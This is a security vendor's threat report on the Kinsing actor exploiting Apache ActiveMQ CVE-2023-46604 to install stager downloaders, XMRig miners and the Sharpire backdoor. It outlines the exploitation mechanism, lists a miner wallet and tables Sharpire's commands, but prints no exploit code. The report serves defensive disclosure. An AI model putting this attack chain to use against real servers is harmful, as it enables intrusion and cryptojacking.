Case of ActiveMQ Vulnerability Exploitation to Install Sharpire (Kinsing)
AhnLab SEcurity intelligence Center (ASEC) has confirmed that the Kinsing threat actor is still distributing malware by exploiting known vulnerabilities. Since the disclosure of the CVE-2023-46604 vulnerability in ActiveMQ, the threat actor has been exploiting it to install malware on both Linux and Windows systems. [1] Aside from the well-known XMRig and Stager, the latest attack cases also involved Sharpire. Sharpire is a .NET backdoor that supports PowerShell Empire. During the process of taking control of the infected system, the threat actor uses CobaltStrike, Meterpreter, and PowerShell Empire together.
1. Kinsing (H2Miner)
Kinsing, also known as H2Miner, was first identified by the Alibaba Cloud Security team in January 2020. [2] The malware strains are constantly adding new attack techniques for installing coin miners on inappropriately managed or vulnerable services. In the case of Docker, the Kinsing threat actor targets the Docker daemon API port with a misconfiguration, [3] while for Redis, they exploit the remote code execution vulnerability. Other cases include the Log4j vulnerability (CVE-2021-44228) and the ActiveMQ vulnerability (CVE-2023-46604). [4] Aside from exploiting vulnerabilities, they also leverage SSH credentials stored in infected systems during the lateral movement process. [5]
2. ActiveMQ Vulnerability (CVE-2023-46604)
CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ, an open-source messaging and integration pattern server. If an unpatched Apache ActiveMQ server is exposed to the Internet, threat actors can remotely execute malicious commands and take control of the system.
The vulnerability is exploited by manipulating the serialized class type that instructs the OpenWire protocol to instantiate a class in the classpath. If the attacker sends a manipulated packet, the vulnerable server uses the URL in the packet to load the class XML configuration file.
- Recommendation to Apply Security Update for Apache ActiveMQ (CVE-2023-46604) [6]
CVE-2023-46604 has recently started to be exploited, and in Korea, attacks by the Andariel group, HelloKitty ransomware [7], and Mauri ransomware have been identified. [8]
3. Latest attack cases of Kinsing threat actor
Recently, a case has been identified where threat actors have exploited the CVE-2023-46604 vulnerability to distribute malware to vulnerable ActiveMQ servers in Korea. Generally, the vulnerability is exploited by various CoinMiner threat actors, but the Kinsing threat actor uses various types of malware.
Figure 1. Vulnerable ActiveMQ service installing the Stager downloader
The vulnerable Java process of Apache ActiveMQ loads the XML configuration file and executes the specified command based on this file, which is provided by the threat actor. The following is the XML configuration file used in the attack, responsible for using the msiexec command to install MSI malware from an external source.
Figure 2. Class XML configuration file used in the attack
During the attack, the threat actor installed a malware named “mm13.exe” in addition to MSI. Both MSI and “mm13.exe” are downloader malware. As of now, the download is unavailable, so it is not known what malware was downloaded. However, in general, this type of malware is responsible for downloading and executing CobaltStrike or Metasploit’s Meterpreter in the memory. This type is also known as Stager.
Figure 3. Download URL of Stager
It is also worth noting that the address used in the attack was found to include malware targeting Linux systems. The following is a relatively simple Bash script, which adds the Kinsing threat actor’s wallet address to the XMRig configuration file, as mentioned in a previous Fortinet report.
Figure 4. Kinsing threat actor’s Bash malware
- Wallet – 1 : “linux
- Password – 1 : “linux
- Wallet – 2 : “89UoMhtsrpaJTvmJBbvy1cTdg38pomPFnW5Z4sniL2izcLQyGBkEGd96TcBJtzQUi6KAL5Ehe4cFpEMNdGF7tFKpJ1DqE8X
- Password – 2 : “lin
Aside from the threat actor’s download server, there is also a malware strain named Sharpire. Among the open-source Post-Exploitation frameworks is Powershell Empire, which is developed in PowerShell and used by various threat actors. Sharpire is a .NET-developed backdoor that supports Powershell Empire. It is presumed that the threat actor would have used Sharpire in addition to Cobalt Strike or Meterpreter to control the infected systems.
Figure 5. Configuration data of Sharpire
| Command | Feature |
|---|---|
| Default | Execute PowerShell command (Full) |
| shell | Execute PowerShell command (argument) |
| ls, dir, gci | List directory |
| mv, move | Move file |
| cp, copy | Copy file |
| rm, del, rmdir | Delete file |
| cd | Change current directory |
| ifconfig, ipconfig | Check network configuration information |
| ps, tasklist | List processes |
| route | Query routing table information |
| whoami, getuid | Query current user |
| hostname | Look up host name |
| reboot, restart | Reboot system |
| shutdown | Shut down system |
Table 1. List of commands supported by Sharpire
4. Conclusion
Threat actors are continuously attacking vulnerable, unpatched Apache ActiveMQ services. Among the identified attacks, there is a case of Kinsing threat actor who, like in the past, install coin miners to mine cryptocurrency. However, it was also found that they installed malware to control the infected systems. The Kinsing threat actor installs remote management tools such as XMRig, CobaltStrike, Meterpreter, and Sharpire in the infected systems. They use these tools to mine cryptocurrency, steal information, and install ransomware.
